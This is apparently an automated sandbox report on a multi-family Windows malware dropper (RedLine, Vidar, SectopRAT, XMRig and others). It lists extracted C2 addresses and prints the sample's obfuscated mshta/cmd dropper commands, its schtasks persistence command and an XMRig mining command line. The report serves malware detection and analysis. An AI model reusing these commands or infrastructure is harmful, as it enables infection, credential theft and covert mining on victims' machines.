fabookie | cebf4c9af84506f3b683d5d4867b739244b6ba595772d583b3455781c4d91b74

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
31-03-2024 02:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe
Size

5.1MB
MD5

4a67cb6ed0cf60ddcf3e45917898dec4
SHA1

b219ad475097853384d95a0924727389e8610ccb
SHA256

cebf4c9af84506f3b683d5d4867b739244b6ba595772d583b3455781c4d91b74
SHA512

aa9c91076de6a134df17ef9a2c2b78dc268b7f7dbb2eafa36b63fdfd20b329a58f08e096e2a61dcbbd85399bd8597e08a6e493d1ab1d54fd840918612ff01620
SSDEEP

98304:h3OOqyTG+H9QG7l1rvQjPleoGI9Wek2WiCU+gw6pTslbqXD09r/:9pRl1L0P4or9ytiG6WlmD09r/

Score

10^/10

fabookie gcleaner lgoogloader onlylogger redline sectoprat vidar xmrig 933 sad downloader infostealer loader miner rat spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

sad

107.172.13.162:42751

Attributes

auth_value
e0d869e5b6b2c87306c1e350a5d1e544

Extracted

Family

gcleaner

ggg-cl.biz

45.9.20.13

Extracted

Family

vidar

Version

41.2

Botnet

933

https://mas.to/@serg4325

Attributes

profile_id
933

Signatures

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023201-94.dat	family_fabookie

Detects LgoogLoader payload 1 IoCs

resource	yara_rule
behavioral2/memory/5044-27-0x00000000022A0000-0x00000000022B2000-memory.dmp	family_lgoogloader

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
LgoogLoader
A downloader capable of dropping and executing other malware families.
downloader lgoogloader
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	532	464	rUNdlL32.eXe	114

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00070000000231fb-44.dat	family_redline
behavioral2/memory/1560-69-0x0000000000160000-0x0000000000182000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00070000000231fb-44.dat	family_sectoprat
behavioral2/memory/1560-69-0x0000000000160000-0x0000000000182000-memory.dmp	family_sectoprat

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

OnlyLogger payload 3 IoCs

resource	yara_rule
behavioral2/memory/4636-162-0x0000000000400000-0x00000000016D2000-memory.dmp	family_onlylogger
behavioral2/memory/4636-169-0x00000000031F0000-0x000000000321F000-memory.dmp	family_onlylogger
behavioral2/memory/4636-230-0x0000000000400000-0x00000000016D2000-memory.dmp	family_onlylogger

Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral2/memory/4024-190-0x0000000000600000-0x00000000006D6000-memory.dmp	family_vidar
behavioral2/memory/4024-191-0x0000000000400000-0x00000000004D9000-memory.dmp	family_vidar
behavioral2/memory/4024-229-0x0000000000400000-0x00000000004D9000-memory.dmp	family_vidar

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral2/memory/3028-325-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3028-327-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3028-328-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/3028-332-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

flow	pid	Process
93	4220	rundll32.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	setup.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	Chrome 5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	services64.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	sfx_123_206.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	4MCYlgNAW.eXE
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation	rundll32.exe

Executes dropped EXE 19 IoCs

pid	Process
5044	inst1.exe
4564	DownFlSetup110.exe
4024	Soft1ww01.exe
1560	sad.exe
3484	sfx_123_206.exe
3968	setup.exe
4636	setup_2.exe
2412	setup.tmp
3744	jhuuee.exe
3852	zyl-game.exe
1984	3.exe
4476	setup.exe
3676	Chrome 5.exe
1676	setup.tmp
4424	4MCYlgNAW.eXE
4356	services64.exe
4892	sihost64.exe
2764	e587f1e.exe
392	e58ac48.exe

Loads dropped DLL 5 IoCs

pid	Process
2412	setup.tmp
1676	setup.tmp
3004	rundll32.exe
3592	rundll32.exe
4220	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service

T1102

flow	ioc
103	raw.githubusercontent.com
109	pastebin.com
110	pastebin.com
11	iplogger.org
12	iplogger.org
13	iplogger.org
17	iplogger.org
102	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4356 set thread context of 3028	4356	services64.exe	165

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 15 IoCs

pid	pid_target	Process	procid_target
1548	4636	WerFault.exe	96
5108	4636	WerFault.exe	96
2228	3004	WerFault.exe	117
1888	4636	WerFault.exe	96
3472	4636	WerFault.exe	96
4728	4636	WerFault.exe	96
2704	4636	WerFault.exe	96
3552	4636	WerFault.exe	96
1892	4024	WerFault.exe	91
2328	4636	WerFault.exe	96
4656	4636	WerFault.exe	96
1004	4636	WerFault.exe	96
3784	2764	WerFault.exe	166
2660	392	WerFault.exe	170
5112	4636	WerFault.exe	96

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5052	schtasks.exe
3396	schtasks.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
640	taskkill.exe

Suspicious behavior: EnumeratesProcesses 56 IoCs

pid	Process
3676	Chrome 5.exe
3676	Chrome 5.exe
4356	services64.exe
4356	services64.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe
3028	explorer.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4564	DownFlSetup110.exe
Token: SeDebugPrivilege	1984	3.exe
Token: SeDebugPrivilege	640	taskkill.exe
Token: SeDebugPrivilege	3676	Chrome 5.exe
Token: SeDebugPrivilege	4356	services64.exe
Token: SeLockMemoryPrivilege	3028	explorer.exe
Token: SeLockMemoryPrivilege	3028	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4616 wrote to memory of 5044	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	89
PID 4616 wrote to memory of 5044	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	89
PID 4616 wrote to memory of 5044	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	89
PID 4616 wrote to memory of 4564	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	90
PID 4616 wrote to memory of 4564	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	90
PID 4616 wrote to memory of 4024	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	91
PID 4616 wrote to memory of 4024	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	91
PID 4616 wrote to memory of 4024	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	91
PID 4616 wrote to memory of 1560	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	92
PID 4616 wrote to memory of 1560	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	92
PID 4616 wrote to memory of 1560	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	92
PID 4616 wrote to memory of 3484	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	94
PID 4616 wrote to memory of 3484	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	94
PID 4616 wrote to memory of 3484	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	94
PID 4616 wrote to memory of 3968	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	95
PID 4616 wrote to memory of 3968	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	95
PID 4616 wrote to memory of 3968	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	95
PID 4616 wrote to memory of 4636	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	96
PID 4616 wrote to memory of 4636	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	96
PID 4616 wrote to memory of 4636	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	96
PID 3484 wrote to memory of 4584	3484	sfx_123_206.exe	97
PID 3484 wrote to memory of 4584	3484	sfx_123_206.exe	97
PID 3484 wrote to memory of 4584	3484	sfx_123_206.exe	97
PID 3968 wrote to memory of 2412	3968	setup.exe	98
PID 3968 wrote to memory of 2412	3968	setup.exe	98
PID 3968 wrote to memory of 2412	3968	setup.exe	98
PID 4616 wrote to memory of 3744	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	99
PID 4616 wrote to memory of 3744	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	99
PID 4616 wrote to memory of 3852	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	100
PID 4616 wrote to memory of 3852	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	100
PID 4616 wrote to memory of 3852	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	100
PID 4616 wrote to memory of 1984	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	101
PID 4616 wrote to memory of 1984	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	101
PID 2412 wrote to memory of 4476	2412	setup.tmp	102
PID 2412 wrote to memory of 4476	2412	setup.tmp	102
PID 2412 wrote to memory of 4476	2412	setup.tmp	102
PID 4584 wrote to memory of 3164	4584	mshta.exe	104
PID 4584 wrote to memory of 3164	4584	mshta.exe	104
PID 4584 wrote to memory of 3164	4584	mshta.exe	104
PID 4616 wrote to memory of 3676	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	106
PID 4616 wrote to memory of 3676	4616	4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe	106
PID 4476 wrote to memory of 1676	4476	setup.exe	108
PID 4476 wrote to memory of 1676	4476	setup.exe	108
PID 4476 wrote to memory of 1676	4476	setup.exe	108
PID 3164 wrote to memory of 4424	3164	cmd.exe	110
PID 3164 wrote to memory of 4424	3164	cmd.exe	110
PID 3164 wrote to memory of 4424	3164	cmd.exe	110
PID 3164 wrote to memory of 640	3164	cmd.exe	112
PID 3164 wrote to memory of 640	3164	cmd.exe	112
PID 3164 wrote to memory of 640	3164	cmd.exe	112
PID 4424 wrote to memory of 2576	4424	4MCYlgNAW.eXE	113
PID 4424 wrote to memory of 2576	4424	4MCYlgNAW.eXE	113
PID 4424 wrote to memory of 2576	4424	4MCYlgNAW.eXE	113
PID 532 wrote to memory of 3004	532	rUNdlL32.eXe	117
PID 532 wrote to memory of 3004	532	rUNdlL32.eXe	117
PID 532 wrote to memory of 3004	532	rUNdlL32.eXe	117
PID 2576 wrote to memory of 3424	2576	mshta.exe	120
PID 2576 wrote to memory of 3424	2576	mshta.exe	120
PID 2576 wrote to memory of 3424	2576	mshta.exe	120
PID 4424 wrote to memory of 2392	4424	4MCYlgNAW.eXE	124
PID 4424 wrote to memory of 2392	4424	4MCYlgNAW.eXE	124
PID 4424 wrote to memory of 2392	4424	4MCYlgNAW.eXE	124
PID 2392 wrote to memory of 3792	2392	mshta.exe	126
PID 2392 wrote to memory of 3792	2392	mshta.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\4a67cb6ed0cf60ddcf3e45917898dec4_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4616
- C:\Users\Admin\AppData\Local\Temp\inst1.exe
  "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
  2⤵
  - Executes dropped EXE
  PID:5044
- C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
  "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4564
- C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe
  "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
  2⤵
  - Executes dropped EXE
  PID:4024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 1016
    3⤵
    - Program crash
    PID:1892
- C:\Users\Admin\AppData\Local\Temp\sad.exe
  "C:\Users\Admin\AppData\Local\Temp\sad.exe"
  2⤵
  - Executes dropped EXE
  PID:1560
- C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe
  "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3484
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4584
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3164
    - - C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE
        
        ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4424
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2576
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"
        7⤵
        
        PID:3424
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:2392
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G
        7⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
        8⤵
        
        PID:3544
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"
        8⤵
        
        PID:1348
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\kZ_AmsXL.6G
        8⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
        9⤵
        Checks computer location settings
        Loads dropped DLL
        
        PID:3592
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G
        10⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G
        11⤵
        Blocklisted process makes network request
        Checks computer location settings
        Loads dropped DLL
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\e587f1e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e587f1e.exe"
        12⤵
        Executes dropped EXE
        
        PID:2764
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 812
        13⤵
        Program crash
        
        PID:3784
        
        C:\Users\Admin\AppData\Local\Temp\e58ac48.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e58ac48.exe"
        10⤵
        Executes dropped EXE
        
        PID:392
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 784
        11⤵
        Program crash
        
        PID:2660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f /Im "sfx_123_206.exe"
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:640
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3968
- - C:\Users\Admin\AppData\Local\Temp\is-KG03F.tmp\setup.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-KG03F.tmp\setup.tmp" /SL5="$A0214,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2412
  - - C:\Users\Admin\AppData\Local\Temp\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4476
    - - C:\Users\Admin\AppData\Local\Temp\is-JCB3F.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JCB3F.tmp\setup.tmp" /SL5="$601D4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1676
- C:\Users\Admin\AppData\Local\Temp\setup_2.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
  2⤵
  - Executes dropped EXE
  PID:4636
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 632
    3⤵
    - Program crash
    PID:1548
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 640
    3⤵
    - Program crash
    PID:5108
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 644
    3⤵
    - Program crash
    PID:1888
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 784
    3⤵
    - Program crash
    PID:3472
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 852
    3⤵
    - Program crash
    PID:4728
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 992
    3⤵
    - Program crash
    PID:2704
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 1160
    3⤵
    - Program crash
    PID:3552
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 880
    3⤵
    - Program crash
    PID:2328
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 872
    3⤵
    - Program crash
    PID:4656
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 1404
    3⤵
    - Program crash
    PID:1004
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 1164
    3⤵
    - Program crash
    PID:5112
- C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
  2⤵
  - Executes dropped EXE
  PID:3744
- C:\Users\Admin\AppData\Local\Temp\zyl-game.exe
  "C:\Users\Admin\AppData\Local\Temp\zyl-game.exe"
  2⤵
  - Executes dropped EXE
  PID:3852
- C:\Users\Admin\AppData\Local\Temp\3.exe
  "C:\Users\Admin\AppData\Local\Temp\3.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
  "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3676
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
    3⤵
    PID:2380
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
      4⤵
      Creates scheduled task(s)
      PID:5052
- - C:\Users\Admin\AppData\Roaming\services64.exe
    "C:\Users\Admin\AppData\Roaming\services64.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4356
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:3792
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:3396
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
      4⤵
      Executes dropped EXE
      PID:4892
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4636 -ip 4636
1⤵
PID:388

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:532
- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:3004
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 600
    3⤵
    - Program crash
    PID:2228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4636 -ip 4636
1⤵
PID:1552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3004 -ip 3004
1⤵
PID:3360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4636 -ip 4636
1⤵
PID:4960

C:\Windows\SysWOW64\WerFault.exe
